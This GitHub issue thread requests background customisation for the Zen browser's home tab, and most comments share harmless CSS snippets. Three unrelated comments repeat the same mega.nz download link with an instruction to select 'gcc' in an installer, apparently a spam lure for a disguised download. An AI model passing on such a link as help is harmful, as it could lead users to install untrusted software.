### ISSUE TITLE
Adding a way to cuztomize background of home tab and whole browser

### ISSUE THREAD

**Issue by Dredragon-Austin** [zen-browser/desktop#656]
### What feature would you like to see?

Adding a way to cuztomize background of home tab so that it look good

### Other details

here is a example of a tab that I customize
![image](https://github.com/user-attachments/assets/58816053-08ad-4e1e-8707-e31c4b51d077)

it does cost me a lot of time to figure that out but hope u can add that to the Zen browser ☺️

### The css code i use:
:root {
  --zen-main-browser-background: none !important;
}
html#main-window > body {
  background: url(Omen/Ep8a1_Defiance_Youtube\ Cover_.png) !important;
  background-repeat: no-repeat !important;
  background-size: cover !important;
  background-position: bottom right !important;
  background-attachment: fixed !important;
}
.outer-wrapper {
  background: url(Omen/Ep8a1_Defiance_Youtube\ Cover_.png) !important;
  background-repeat: no-repeat !important;
  background-size: 1366px 768px !important;
  background-position: bottom right !important;
  background-attachment: fixed !important;
}

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by DavidGreen63** [comment]
In all my Firefox browsers, I just used the extension called Stylus, and injected code into the Google home page.

```
div.L3eUgb {
  background-image: url("xxxxx.jpeg");
  background-repeat: no-repeat;
  background-position: center center; /* was bottom right */
  background-size: cover; /* was contain */
}
div.c93Gbe {
  background:#fff0;
}
```
So it looks like this in Zen

![Clipboard01](https://github.com/user-attachments/assets/8e8a402e-2721-4028-aad4-9582dc17c341)

**Comment by dhruvvk2326** [comment]
@Dredragon-Austin  how did you customize your toolbar can you provide the css code or which css code you used .
Also which font are you using

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by JavierFlores09** [comment]
just use the userContent.css:
```css
@-moz-document url(about:home), url(about:newtab), url(chrome://browser/content/blanktab.html) { 
    body { 
        background-image: url(make-heroine.png) !important;
        background-size: cover !important;
        background-repeat: no-repeat !important;
    }
}
```
